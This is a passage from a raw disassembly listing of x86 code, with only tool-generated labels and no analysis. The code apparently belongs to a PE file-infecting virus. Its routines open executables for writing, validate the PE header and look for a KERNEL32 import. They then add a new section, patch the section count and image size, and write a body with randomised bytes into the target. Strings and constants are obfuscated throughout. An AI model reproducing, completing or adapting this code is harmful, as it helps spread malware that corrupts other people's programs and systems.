arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov byte ptr [ebx], 0
mov ecx, esi
or eax, 0FFFFFFFFh
loc_422F15: ; CODE XREF: sub_422EFF+1B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_422F15
mov [ebp+var_4], eax
mov edi, ds:100131D4h
sub edi, 2
jmp short loc_422F9A
; ---------------------------------------------------------------------------
loc_422F2A: ; CODE XREF: sub_422EFF+9E�j
movzx eax, [ebp+arg_8]
cmp edi, eax
jb short loc_422F3D
mov al, [esi+edi]
cmp al, 2Fh
jz short loc_422F3D
cmp al, 2Eh
jnz short loc_422F5C
loc_422F3D: ; CODE XREF: sub_422EFF+31�j
; sub_422EFF+38�j
push 10013878h
call sub_41E914
movzx edx, byte ptr [esi+edi]
push edx
push eax
lea edx, [ebp+var_7]
push edx
call dword ptr ds:10012634h
add esp, 10h
jmp short loc_422F8B
; ---------------------------------------------------------------------------
loc_422F5C: ; CODE XREF: sub_422EFF+3C�j
push 10013873h
call sub_41E914
push eax
push ebx
call dword ptr ds:1000D020h
push 1001386Bh
call sub_41E914
movzx edx, byte ptr [esi+edi]
push edx
push eax
lea edx, [ebp+var_7]
push edx
call dword ptr ds:10012634h
add esp, 1Ch
loc_422F8B: ; CODE XREF: sub_422EFF+5B�j
lea eax, [ebp+var_7]
push eax
push ebx
call dword ptr ds:1000D020h
add esp, 8
inc edi
loc_422F9A: ; CODE XREF: sub_422EFF+29�j
cmp edi, [ebp+var_4]
jb short loc_422F2A
pop edi
pop esi
pop ebx
leave
retn
sub_422EFF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422FA4 proc near ; CODE XREF: sub_41BF88+188�p
var_170 = byte ptr -170h
var_16C = dword ptr -16Ch
var_168 = byte ptr -168h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 170h
push ebx
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000F600h
lea eax, [ebp+var_168]
push eax
call sub_421C67
push 10013866h
call sub_41E914
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000D020h
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000D020h
push 1001385Eh
call sub_41E914
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000D020h
add esp, 24h
push 0
mov eax, ds:100130F0h
add eax, ds:10013158h
sub eax, 0Ah
push eax
push 3
push 0
mov eax, ds:100131E8h
add eax, ds:100130D4h
sub eax, 7
push eax
push 80000000h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:10012788h
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_42306B
mov eax, ds:10013268h
sub eax, 4
mov edx, [ebp+arg_0]
mov ecx, ds:10013288h
sub ecx, 6
mov [edx+eax], cl
jmp short loc_4230D8
; ---------------------------------------------------------------------------
loc_42306B: ; CODE XREF: sub_422FA4+AC�j
push 0
push 0
push [ebp+arg_4]
push edi
call dword ptr ds:10012B9Ch
push 0
lea eax, [ebp+var_170]
push eax
mov eax, ds:10013194h
add eax, 0Bh
push eax
push [ebp+arg_0]
push edi
call dword ptr ds:1000D028h
mov [ebp+var_16C], eax
push edi
call dword ptr ds:10011654h
mov eax, ds:100130F8h
add eax, ds:10013234h
sub eax, 0Bh
cmp [ebp+var_16C], eax
jnz short loc_4230D8
mov eax, ds:100131A8h
sub eax, 2
mov edx, [ebp+arg_0]
mov ecx, ds:1001309Ch
movsx ebx, word ptr ds:100130BCh
add ecx, ebx
sub ecx, 0Eh
mov [edx+eax], cl
loc_4230D8: ; CODE XREF: sub_422FA4+C5�j
; sub_422FA4+112�j
pop edi
pop esi
pop ebx
leave
retn
sub_422FA4 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+0Ch]
mov edi, [ebp+10h]
push 10014AC8h
push esi
call dword ptr ds:10012648h
or eax, eax
jz short loc_423109
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_423151
; ---------------------------------------------------------------------------
loc_423109: ; CODE XREF: .data:004230F7�j
push 10014A48h
push esi
call dword ptr ds:10012648h
or eax, eax
jz short loc_423129
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_423151
; ---------------------------------------------------------------------------
loc_423129: ; CODE XREF: .data:00423117�j
push 10014A28h
push esi
call dword ptr ds:10012648h
or eax, eax
jz short loc_423149
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_423151
; ---------------------------------------------------------------------------
loc_423149: ; CODE XREF: .data:00423137�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_423151: ; CODE XREF: .data:00423107�j
; .data:00423127�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
; =============== S U B R O U T I N E =======================================
sub_423158 proc near ; CODE XREF: .data:00421037�p
push edi
push 10013853h
call sub_41E914
pop ecx
push eax
call dword ptr ds:1000F5E8h
mov ds:100132ACh, eax
test eax, eax
jnz short loc_42318B
push 10013848h
call sub_41E914
pop ecx
push eax
call dword ptr ds:10010244h
mov ds:100132ACh, eax
loc_42318B: ; CODE XREF: sub_423158+1A�j
cmp dword ptr ds:100132ACh, 0
jz short loc_4231B1
push 10013832h
call sub_41E914
pop ecx
push eax
push dword ptr ds:100132ACh
call dword ptr ds:1000F1F8h
mov ds:1000F604h, eax
loc_4231B1: ; CODE XREF: sub_423158+3A�j
pop edi
retn
sub_423158 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4231B3 proc near ; CODE XREF: sub_41D354+11B�p
var_270 = byte ptr -270h
var_26C = dword ptr -26Ch
var_267 = byte ptr -267h
var_203 = byte ptr -203h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 270h
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000F600h
lea eax, [ebp+var_267]
push eax
call sub_421C67
push 1001382Dh
call sub_41E914
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000D020h
lea eax, [ebp+var_267]
push eax
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000D020h
push 10013825h
call sub_41E914
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000D020h
add esp, 24h
push 0
mov eax, ds:10013154h
add eax, ds:100131F8h
sub eax, 0Ah
push eax
push 3
push 0
mov eax, ds:100131E8h
dec eax
push eax
push 80000000h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:10012788h
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_42325F
mov eax, 2Ah
jmp short loc_4232CA
; ---------------------------------------------------------------------------
loc_42325F: ; CODE XREF: sub_4231B3+A3�j
push 0
lea eax, [ebp+var_270]
push eax
push 0FFh
lea eax, [ebp+var_203]
push eax
push edi
call dword ptr ds:1000D028h
mov [ebp+var_26C], eax
push edi
call dword ptr ds:10011654h
mov eax, ds:100131A0h
sub eax, 3
cmp [ebp+var_26C], eax
jnz short loc_42329F
mov eax, 2Ah
jmp short loc_4232CA
; ---------------------------------------------------------------------------
loc_42329F: ; CODE XREF: sub_4231B3+E3�j
movzx eax, [ebp+var_203]
movsx edx, word ptr ds:10013098h
movsx ecx, word ptr ds:10013174h
lea edx, [edx+ecx+18h]
cmp eax, edx
jge short loc_4232C3
mov eax, 2Ah
jmp short loc_4232CA
; ---------------------------------------------------------------------------
loc_4232C3: ; CODE XREF: sub_4231B3+107�j
movzx eax, [ebp+var_203]
loc_4232CA: ; CODE XREF: sub_4231B3+AA�j
; sub_4231B3+EA�j ...
pop edi
pop esi
leave
retn
sub_4231B3 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, ds:100130F4h
sub eax, 7
cmp ds:10012BA8h, eax
jbe short loc_4232EC
push 10012BA8h
call dword ptr ds:1000D010h
loc_4232EC: ; CODE XREF: .data:004232DF�j
mov eax, ds:10012BA8h
pop ebp
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edi
mov edi, [ebp+0Ch]
mov eax, [ebp+18h]
mov [ebp+18h], ax
movsx eax, word ptr ds:1001324Ch
mov edx, ds:100130B4h
lea eax, [eax+edx+0E9h]
cmp edi, eax
jnz short loc_423328
push dword ptr [ebp+1Ch]
call sub_41A999
pop ecx
xor eax, eax
jmp short loc_42334E
; ---------------------------------------------------------------------------
loc_423328: ; CODE XREF: .data:00423319�j
mov eax, ds:100130B4h
add eax, 0F5h
add eax, ds:1001314Ch
cmp edi, eax
jnz short loc_423349
push dword ptr [ebp+1Ch]
call sub_41CD81
pop ecx
xor eax, eax
jmp short loc_42334E
; ---------------------------------------------------------------------------
loc_423349: ; CODE XREF: .data:0042333A�j
mov eax, 80020003h
loc_42334E: ; CODE XREF: .data:00423326�j
; .data:00423347�j
pop edi
pop ebp
retn 24h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423353 proc near ; CODE XREF: sub_4226A9+1D0�p
var_32014 = byte ptr -32014h
var_32011 = byte ptr -32011h
var_32010 = dword ptr -32010h
var_3200C = dword ptr -3200Ch
var_32007 = byte ptr -32007h
var_32006 = byte ptr -32006h
var_31F58 = dword ptr -31F58h
var_31F54 = dword ptr -31F54h
var_31F50 = dword ptr -31F50h
var_31F4C = dword ptr -31F4Ch
var_31F48 = dword ptr -31F48h
var_31F44 = dword ptr -31F44h
var_31F40 = dword ptr -31F40h
var_31F3C = dword ptr -31F3Ch
var_31F38 = dword ptr -31F38h
var_31F34 = dword ptr -31F34h
var_31F30 = dword ptr -31F30h
var_31F2C = dword ptr -31F2Ch
var_31F28 = dword ptr -31F28h
var_31F24 = dword ptr -31F24h
var_31F20 = dword ptr -31F20h
var_31F1C = dword ptr -31F1Ch
var_31F18 = dword ptr -31F18h
var_31F14 = dword ptr -31F14h
var_31F10 = dword ptr -31F10h
var_31F0C = dword ptr -31F0Ch
var_31F08 = dword ptr -31F08h
var_31F04 = dword ptr -31F04h
var_31F00 = dword ptr -31F00h
var_31EFC = dword ptr -31EFCh
var_31EF8 = dword ptr -31EF8h
var_31EF4 = dword ptr -31EF4h
var_31EF0 = dword ptr -31EF0h
var_31EEC = dword ptr -31EECh
var_31EE8 = dword ptr -31EE8h
var_31EE4 = dword ptr -31EE4h
var_31EE0 = dword ptr -31EE0h
var_31EDC = dword ptr -31EDCh
var_31ED8 = dword ptr -31ED8h
var_31ED4 = byte ptr -31ED4h
var_31EC7 = byte ptr -31EC7h
var_1194 = dword ptr -1194h
var_1190 = dword ptr -1190h
var_118C = dword ptr -118Ch
var_1188 = dword ptr -1188h
var_1184 = dword ptr -1184h
var_1180 = dword ptr -1180h
var_117C = dword ptr -117Ch
var_1178 = dword ptr -1178h
var_1174 = dword ptr -1174h
var_116F = byte ptr -116Fh
var_1070 = dword ptr -1070h
var_106C = dword ptr -106Ch
var_1068 = dword ptr -1068h
var_1064 = dword ptr -1064h
var_1060 = dword ptr -1060h
var_105C = dword ptr -105Ch
var_1058 = dword ptr -1058h
var_1054 = dword ptr -1054h
var_1050 = dword ptr -1050h
var_C54 = dword ptr -0C54h
var_C50 = dword ptr -0C50h
var_C4C = dword ptr -0C4Ch
var_850 = dword ptr -850h
var_84C = dword ptr -84Ch
var_848 = dword ptr -848h
var_844 = dword ptr -844h
var_840 = dword ptr -840h
var_83C = dword ptr -83Ch
var_440 = dword ptr -440h
var_43C = dword ptr -43Ch
var_438 = dword ptr -438h
var_434 = dword ptr -434h
var_430 = dword ptr -430h
var_42C = dword ptr -42Ch
var_428 = dword ptr -428h
var_424 = dword ptr -424h
var_420 = dword ptr -420h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 32010h
call sub_425379
push ebx
push esi
push edi
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_31EC7]
push eax
call dword ptr ds:10011638h
add esp, 0Ch
push 0
mov eax, ds:1001309Ch
sub eax, 5
push eax
push 3
push 0
mov eax, ds:10013234h
add eax, ds:10013284h
sub eax, 0Dh
push eax
push 0C0000001h
push [ebp+arg_0]
call dword ptr ds:10012788h
mov [ebp+var_1070], eax
cmp eax, 0FFFFFFFFh
jnz short loc_4233B7
xor eax, eax
jmp loc_424846
; ---------------------------------------------------------------------------
loc_4233B7: ; CODE XREF: sub_423353+5B�j
push 0
push [ebp+var_1070]
call dword ptr ds:10012624h
mov [ebp+var_10], eax
mov edx, [ebp+arg_8]
lea eax, [eax+edx+1FFFFh]
push eax
push 0
call dword ptr ds:1000FA34h
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_31EDC]
push eax
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_1070]
call dword ptr ds:1000D028h
mov eax, [ebp+var_4]
mov eax, [eax+3Ch]
mov [ebp+var_840], eax
mov eax, [ebp+var_31EDC]
sub eax, 0F8h
cmp [ebp+var_840], eax
ja loc_42482F
mov eax, [ebp+var_840]
add eax, [ebp+var_4]
mov [ebp+var_8], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jnz loc_42482F
mov eax, [ebp+var_8]
movzx eax, word ptr [eax+5Ch]
movsx edx, word ptr ds:100130CCh
sub edx, 6
cmp eax, edx
jz loc_42482F
and [ebp+var_1180], 0
mov eax, [ebp+var_8]
movzx edx, word ptr [eax+44h]
mov ecx, ds:10013238h
add ecx, 7
add ecx, ds:100130D4h
cmp edx, ecx
jnz short loc_4234B2
mov edx, ds:100130C4h
inc edx
mov [eax+1Ah], dl
cmp dl, 0
jz short loc_4234B2
movzx eax, word ptr [eax+46h]
mov [ebp+var_31EEC], eax
movsx eax, word ptr ds:1001322Ch
movsx edx, word ptr ds:100130FCh
add eax, edx
sub eax, 0Bh
cmp [ebp+var_31EEC], eax
jnb loc_42482F
mov [ebp+var_1180], 1
loc_4234B2: ; CODE XREF: sub_423353+11B�j
; sub_423353+12A�j
cmp [ebp+var_1180], 0
jz short loc_4234D3
mov eax, [ebp+var_8]
add eax, 6
movzx edx, word ptr [eax]
movsx ecx, word ptr ds:100130C0h
add ecx, 2
sub edx, ecx
mov [eax], dx
loc_4234D3: ; CODE XREF: sub_423353+166�j
mov eax, [ebp+var_8]
mov eax, [eax+80h]
mov [ebp+var_430], eax
mov eax, 28h
mov [ebp+var_31EEC], eax
mov edx, [ebp+var_8]
mov [ebp+var_31EF4], edx
mov ecx, [ebp+var_840]
add ecx, 0F8h
mov [ebp+var_31EF0], eax
movzx edi, word ptr [edx+6]
mul edi
mov [ebp+var_31EF8], eax
mov edx, ecx
add edx, eax
mov [ebp+var_31F00], edx
mov eax, [ebp+var_31EEC]
mov [ebp+var_31EFC], eax
mov ecx, ds:100130B8h
movsx edi, word ptr ds:10013240h
add ecx, edi
dec ecx
mul ecx
mov [ebp+var_31F04], eax
mov eax, [ebp+var_31F00]
mov edx, [ebp+var_31F04]
add eax, edx
mov edx, [ebp+var_31EF4]
add eax, [edx+0D4h]
cmp eax, [edx+54h]
ja loc_42482F
mov eax, ds:10013128h
movsx edx, word ptr ds:100131E0h
add eax, edx
sub eax, 0Ch
mov [ebp+var_20], eax
movsx eax, word ptr ds:10013260h
add eax, ds:100131B0h
sub eax, 9
mov [ebp+var_C54], eax
mov eax, ds:10013238h
mov [ebp+var_105C], eax
mov eax, ds:100131D8h
movsx edx, word ptr ds:10013208h
add eax, edx
sub eax, 0Eh
mov [ebp+var_434], eax
jmp loc_423678
; ---------------------------------------------------------------------------
loc_4235B6: ; CODE XREF: sub_423353+332�j
mov eax, 28h
mul [ebp+var_434]
mov [ebp+var_31F10], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F10]
mov esi, edx
add esi, eax
mov eax, [esi+0Ch]
add eax, [esi+8]
mov [ebp+var_31F08], eax
mov eax, [esi+14h]
add eax, [esi+10h]
mov [ebp+var_31F0C], eax
mov eax, [ebp+var_20]
cmp [ebp+var_31F08], eax
jbe short loc_42360D
mov eax, [ebp+var_31F08]
mov [ebp+var_20], eax
loc_42360D: ; CODE XREF: sub_423353+2AF�j
mov eax, [ebp+var_C54]
cmp [ebp+var_31F0C], eax
jbe short loc_423627
mov eax, [ebp+var_31F0C]
mov [ebp+var_C54], eax
loc_423627: ; CODE XREF: sub_423353+2C6�j
mov eax, [ebp+var_8]
mov eax, [eax+0A8h]
cmp eax, [esi+0Ch]
jb short loc_423652
cmp eax, [ebp+var_31F08]
jnb short loc_423652
mov eax, [esi+14h]
mov edx, [ebp+var_8]
add eax, [edx+0A8h]
sub eax, [esi+0Ch]
mov [ebp+var_105C], eax
loc_423652: ; CODE XREF: sub_423353+2E0�j
; sub_423353+2E8�j
mov eax, [ebp+var_430]
mov edx, [esi+0Ch]
cmp eax, edx
jb short loc_423672
add edx, [esi+8]
cmp eax, edx
jnb short loc_423672
sub eax, [esi+0Ch]
add eax, [esi+14h]
mov [ebp+var_844], eax
loc_423672: ; CODE XREF: sub_423353+30A�j
; sub_423353+311�j
inc [ebp+var_434]
loc_423678: ; CODE XREF: sub_423353+25E�j
mov eax, [ebp+var_8]
movzx eax, word ptr [eax+6]
cmp [ebp+var_434], eax
jb loc_4235B6
mov eax, ds:1001318Ch
add eax, 1000h
push eax
push [ebp+var_20]
call sub_41F094
add esp, 8
mov [ebp+var_20], eax
cmp [ebp+var_1180], 0
jz short loc_4236B6
mov eax, [ebp+var_C54]
mov [ebp+var_10], eax
loc_4236B6: ; CODE XREF: sub_423353+358�j
mov eax, [ebp+var_C54]
cmp [ebp+var_10], eax
jz short loc_4236D9
mov eax, [ebp+var_8]
mov edx, ds:100130C4h
sub edx, 7
cmp [eax+0A8h], edx
jz loc_42482F
loc_4236D9: ; CODE XREF: sub_423353+36C�j
mov eax, ds:100130F8h
sub eax, 7
cmp [ebp+var_105C], eax
jz loc_4237B8
mov eax, ds:10013280h
add eax, ds:1001314Ch
sub eax, 0Ah
mov [ebp+var_31F10], eax
mov eax, ds:10013194h
sub eax, 9
mov [ebp+var_31F08], eax
jmp short loc_42375F
; ---------------------------------------------------------------------------
loc_423711: ; CODE XREF: sub_423353+432�j
mov eax, [ebp+var_105C]
mov [ebp+var_31F14], eax
mov eax, 1Ch
mul [ebp+var_31F08]
mov [ebp+var_31F18], eax
mov eax, [ebp+var_31F14]
mov edx, [ebp+var_31F18]
add eax, edx
add eax, [ebp+var_4]
mov [ebp+var_31F0C], eax
mov edx, [ebp+var_31F10]
cmp [eax+18h], edx
jbe short loc_423759
mov eax, [eax+18h]
mov [ebp+var_31F10], eax
loc_423759: ; CODE XREF: sub_423353+3FB�j
inc [ebp+var_31F08]
loc_42375F: ; CODE XREF: sub_423353+3BC�j
mov edi, [ebp+var_8]
mov eax, [edi+0ACh]
mov ecx, 1Ch
shr eax, 2
mov edx, 24924925h
mul edx
mov [ebp+var_31F14], edx
mov edi, edx
cmp [ebp+var_31F08], edi
jb short loc_423711
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_31F10]
call sub_41F094
add esp, 8
mov [ebp+var_31F10], eax
mov eax, [ebp+var_C54]
cmp eax, [ebp+var_10]
jz short loc_4237B8
cmp [ebp+var_31F10], eax
jnz loc_42482F
loc_4237B8: ; CODE XREF: sub_423353+394�j
; sub_423353+457�j
and [ebp+var_1174], 0
mov eax, ds:10013188h
mov [ebp+var_438], eax
jmp loc_423912
; ---------------------------------------------------------------------------
loc_4237CF: ; CODE XREF: sub_423353+5CE�j
mov eax, [ebp+var_844]
add eax, [ebp+var_438]
add eax, [ebp+var_4]
mov [ebp+var_3200C], eax
mov edx, ds:100130ECh
sub edx, 4
cmp [eax], edx
jz loc_423927
mov eax, [ebp+var_3200C]
mov eax, [eax+0Ch]
sub eax, [ebp+var_430]
add eax, [ebp+var_844]
mov [ebp+var_32010], eax
add eax, [ebp+var_4]
push eax
lea eax, [ebp+var_32007]
push eax
call dword ptr ds:1000F1F4h
add esp, 8
mov eax, ds:100130C8h
mov [ebp+var_31F08], eax
jmp short loc_42385C
; ---------------------------------------------------------------------------
loc_423831: ; CODE XREF: sub_423353+52C�j
mov eax, [ebp+var_31F08]
mov al, [ebp+eax+var_32007]
cmp al, 61h
jle short loc_423856
cmp al, 7Ah
jge short loc_423856
mov eax, [ebp+var_31F08]
lea eax, [ebp+eax+var_32007]
sub byte ptr [eax], 20h
loc_423856: ; CODE XREF: sub_423353+4ED�j
; sub_423353+4F1�j
inc [ebp+var_31F08]
loc_42385C: ; CODE XREF: sub_423353+4DC�j
mov eax, [ebp+var_31F08]
movsx eax, [ebp+eax+var_32007]
movsx edx, word ptr ds:10013104h
movsx ecx, word ptr ds:100130A4h
add edx, ecx
sub edx, 0Eh
cmp eax, edx
jnz short loc_423831
movsx eax, word ptr ds:100130FCh
movsx edx, word ptr ds:100130B0h
add eax, edx
cmp [ebp+eax+var_32014], 4Bh
jnz short loc_42390B
movsx eax, word ptr ds:10013160h
movsx edx, word ptr ds:1001327Ch
add eax, edx
cmp byte ptr [ebp+eax+var_3200C+1], 45h
jnz short loc_42390B
mov eax, ds:10013204h
cmp [ebp+eax+var_32006], 52h
jnz short loc_42390B
mov eax, ds:1001312Ch
mov edx, ds:1001317Ch
add edx, eax
cmp byte ptr [ebp+edx+var_32010+1], 4Ch
jnz short loc_42390B
mov edx, ds:100131F4h
add edx, ds:10013234h
cmp byte ptr [ebp+edx+var_3200C+3], 33h
jnz short loc_42390B
add eax, ds:10013158h
cmp [ebp+eax+var_32011], 32h
jnz short loc_42390B
mov [ebp+var_1174], 1
loc_42390B: ; CODE XREF: sub_423353+546�j
; sub_423353+560�j ...
add [ebp+var_438], 14h
loc_423912: ; CODE XREF: sub_423353+477�j
mov eax, [ebp+var_8]
mov eax, [eax+84h]
cmp [ebp+var_438], eax
jb loc_4237CF
loc_423927: ; CODE XREF: sub_423353+49C�j
cmp [ebp+var_1174], 0
jz loc_42482F
lea eax, [ebp+var_31EC7]
mov [ebp+var_42C], eax
mov eax, [eax+3Ch]
mov [ebp+var_84C], eax
add eax, [ebp+var_42C]
mov [ebp+var_848], eax
cmp [ebp+var_1180], 0
jnz loc_423AFB
mov eax, [ebp+var_8]
mov [ebp+var_31F08], eax
mov edx, ds:100131ACh
sub edx, 5
cmp [eax+0D0h], edx
jz loc_423AFB
mov edx, [eax+0D4h]
mov [ebp+var_31F0C], edx
mov ecx, ds:1001311Ch
movsx edi, word ptr ds:10013218h
add ecx, edi
sub ecx, 0Ah
cmp edx, ecx
jz loc_423AFB
mov ecx, 28h
mov edi, [ebp+var_840]
add edi, 0F8h
mov eax, ecx
mov edx, [ebp+var_31F08]
movzx edx, word ptr [edx+6]
mov [ebp+var_31F10], edx
mul edx
mov [ebp+var_31F14], eax
mov edx, edi
add edx, eax
mov [ebp+var_31F1C], edx
mov eax, ecx
mov [ebp+var_31F18], eax
mov ecx, ds:10013138h
add ecx, 4
mul ecx
mov [ebp+var_31F20], eax
mov eax, [ebp+var_31F1C]
mov edx, [ebp+var_31F20]
add eax, edx
mov edx, [ebp+var_31F0C]
add eax, edx
mov edx, [ebp+var_31F08]
cmp [edx+54h], eax
jbe loc_423AFB
mov eax, [ebp+var_840]
add eax, 0F8h
mov [ebp+var_31F2C], eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F30], eax
mov eax, [ebp+var_31F2C]
mov edx, [ebp+var_31F30]
add eax, edx
mov [ebp+var_31F24], eax
mov [ebp+var_31F34], eax
mov eax, 28h
mov ecx, [ebp+var_848]
movzx ecx, word ptr [ecx+6]
mov edi, ds:100131E4h
add edi, ds:10013224h
sub edi, 7
sub ecx, edi
mul ecx
mov [ebp+var_31F38], eax
mov eax, [ebp+var_31F34]
mov edx, [ebp+var_31F38]
add eax, edx
mov [ebp+var_31F28], eax
mov eax, [ebp+var_8]
push dword ptr [eax+0D4h]
mov eax, [ebp+var_4]
mov edx, [ebp+var_31F24]
add edx, eax
push edx
mov edx, [ebp+var_31F28]
add edx, eax
push edx
call dword ptr ds:10011638h
add esp, 0Ch
mov eax, [ebp+var_8]
add eax, 0D0h
mov [ebp+var_31F3C], eax
mov eax, 28h
mov ecx, [ebp+var_848]
movzx ecx, word ptr [ecx+6]
mov edi, ds:10013140h
sub edi, 7
sub ecx, edi
mul ecx
mov [ebp+var_31F40], eax
mov eax, [ebp+var_31F3C]
mov edx, eax
mov ecx, [ebp+var_31F40]
add [edx], ecx
loc_423AFB: ; CODE XREF: sub_423353+609�j
; sub_423353+627�j ...
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_10]
call sub_41F094
mov [ebp+var_10], eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F24], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F24]
mov esi, edx
add esi, eax
push 1001381Ch
call sub_41E914
push eax
push esi
call dword ptr ds:1000F1F4h
mov eax, ds:10013234h
add eax, 1FFFCh
mov [esi+8], eax
mov eax, [ebp+var_20]
mov [esi+0Ch], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
mov eax, [ebp+arg_8]
add eax, 0Dh
push eax
call sub_41F094
mov [esi+10h], eax
mov eax, [ebp+var_10]
mov [esi+14h], eax
mov eax, ds:10013204h
add eax, 0C000003Fh
mov [esi+24h], eax
movsx eax, word ptr ds:10013144h
mov edx, ds:10013278h
lea eax, [eax+edx+4]
push eax
mov eax, ds:10013210h
mov edx, eax
add edx, eax
mov eax, edx
sub eax, 2
push eax
mov eax, esi
add eax, 18h
push eax
call dword ptr ds:10011644h
mov eax, [ebp+var_20]
mov [ebp+var_1060], eax
mov eax, [ebp+var_10]
mov [ebp+var_850], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
mov eax, [ebp+var_10]
add eax, [esi+10h]
push eax
call sub_41F094
add esp, 30h
mov [ebp+var_10], eax
movsx eax, word ptr ds:10013208h
add eax, 1FFFBh
add [ebp+var_20], eax
mov eax, [ebp+var_8]
add eax, 6
inc word ptr [eax]
mov eax, [ebp+var_8]
mov edx, [esi+0Ch]
add edx, [esi+8]
mov [eax+50h], edx
call dword ptr ds:10012BACh
mov edi, ds:10013164h
sub edi, 3
mov ecx, 0FDh
cdq
idiv ecx
add edi, edx
mov [ebp+var_1064], edi
mov eax, ds:10013248h
mov edx, [ebp+var_42C]
mov ecx, edi
xor ecx, 4Dh
mov [edx+eax], cl
movsx edi, word ptr ds:10013130h
movsx edx, word ptr ds:100130C0h
add edi, edx
sub edi, 4
mov edx, [ebp+var_42C]
mov ecx, [ebp+arg_8]
shr ecx, 9
mov [edx+edi], cl
call dword ptr ds:10012BACh
mov edi, [ebp+var_84C]
mov edx, [ebp+var_42C]
mov [ebp+var_31F2C], edx
mov [ebp+var_31F28], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F2C]
mov [ecx+edi], dl
call dword ptr ds:10012BACh
movsx edx, word ptr ds:10013260h
add edx, ds:1001321Ch
sub edx, 9
add edi, edx
mov edx, [ebp+var_42C]
mov [ebp+var_31F34], edx
mov [ebp+var_31F30], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F34]
mov [ecx+edi], dl
mov eax, ds:100130B4h
add eax, 34h
movsx edx, word ptr ds:10013178h
add eax, edx
mov [ebp+var_43C], eax
jmp short loc_423D0E
; ---------------------------------------------------------------------------
loc_423CD9: ; CODE XREF: sub_423353+9C7�j
call dword ptr ds:10012BACh
mov edi, [ebp+var_43C]
mov edx, [ebp+var_42C]
mov [ebp+var_31F3C], edx
mov [ebp+var_31F38], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F3C]
mov [ecx+edi], dl
inc [ebp+var_43C]
loc_423D0E: ; CODE XREF: sub_423353+984�j
mov eax, [ebp+var_84C]
cmp [ebp+var_43C], eax
jb short loc_423CD9
cmp [ebp+var_1180], 0
jz short loc_423D9D
mov eax, [ebp+var_8]
mov edx, [eax+34h]
add edx, [eax+28h]
mov eax, ds:1001317Ch
movsx ecx, word ptr ds:100131FCh
add eax, ecx
sub eax, 3
add edx, eax
mov [ebp+var_31F40], edx
mov eax, [ebp+var_850]
add eax, ds:1001325Ch
mov edx, [ebp+var_4]
mov eax, [edx+eax]
mov [ebp+var_31F44], eax
movsx edx, word ptr ds:10013250h
mov ecx, ds:100130DCh
lea edx, [edx+ecx-5]
sub eax, edx
add eax, [ebp+var_31F40]
movsx edx, word ptr ds:10013100h
add edx, ds:100131A8h
dec edx
add eax, edx
mov [ebp+var_31F48], eax
mov eax, [ebp+var_8]
mov edx, [ebp+var_31F48]
sub edx, [eax+34h]
mov [eax+28h], edx
loc_423D9D: ; CODE XREF: sub_423353+9D0�j
push 0Dh
push 100132C0h
lea eax, [ebp+var_31ED4]
push eax
call dword ptr ds:10011638h
mov eax, [esi+10h]
add eax, 0Dh
push eax
